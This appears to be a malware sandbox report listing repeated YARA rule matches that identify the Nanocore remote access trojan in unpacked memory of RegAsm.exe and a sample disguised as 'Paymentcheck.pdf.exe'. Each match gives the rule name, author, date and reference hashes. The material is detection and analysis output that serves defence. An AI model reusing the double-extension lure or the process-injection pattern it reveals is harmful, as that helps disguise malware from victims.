Source: 13.2.RegAsm.exe.37c9930.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b21fd6.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b21fd6.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.6950000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6950000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b13ba6.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b13ba6.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.37d81d4.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.37d81d4.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69b0000.36.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69b0000.36.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69f0000.37.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69f0000.37.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69b4c9f.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69b4c9f.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6930000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6930000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b0ad77.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b0ad77.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b21fd6.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b21fd6.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.2857848.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.4ff0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.4ff0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.37ce5cf.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.37ce5cf.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.2808190.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.2808190.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6960000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6960000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6960000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6960000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6920000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6920000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69f0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69f0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6930000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6930000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6940000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6940000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.3b13ba6.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b13ba6.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.2878134.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.6980000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6980000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69be8a4.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69be8a4.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6980000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6980000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6940000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6940000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.2857848.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.2857848.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6030000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6030000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
